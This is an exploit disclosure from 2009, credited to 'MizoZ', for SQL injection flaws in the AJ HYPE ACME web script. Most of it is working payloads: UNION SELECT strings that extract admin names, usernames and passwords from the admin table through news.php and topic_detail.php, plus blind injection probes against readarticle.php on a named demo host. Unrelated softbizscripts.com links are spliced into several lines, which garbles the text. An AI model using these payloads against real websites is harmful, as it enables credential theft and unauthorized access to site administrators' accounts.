AJ HYPE ACME suffers from multiple remote SQL injection vulnerabilities.
2aac3715b1dcc0f1a537565260018f1fd657ed1e0b0abbb09d5bea2d8f552b2b
/*
AJ HYPE ACME (bSQLi/SQLi) Multiple Remote Vulnerabilities
Discovered by : MizoZ
Contact : mizozx@gmail.com
Date : July 29 2009
Greetings : Moudi , Zuka, All friends
*/
SQL Injection news.php (GET : id) :
[HOST]/[PATH]/news.php?id=[SQL
CODE]<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>
SQL CODE :
null+union+select+1,2,concat(admin_name,0x3a,username,0x3a,admin_password),4,5+from+admin--<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>
-----------------------------
SQL Injection topic_detail.php (GET : id) :
[HOST]/[PATH]/forum/topic_detail.php?id=[SQL
CODE]<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>
SQL CODE :
null+union+select+1,2,3,concat(admin_name,0x3a,username,0x3a,admin_password),5,6,7,8+from+admin--<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>
ONLY IN ACME EXTENSION
-----------------------------
Blind SQL Injection readarticle.php (GET : artid)
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+1=1--==>>
TRUE
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+1=0--==>>
FALSE
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+%28select%20@@version%29=5--==>>
TRUE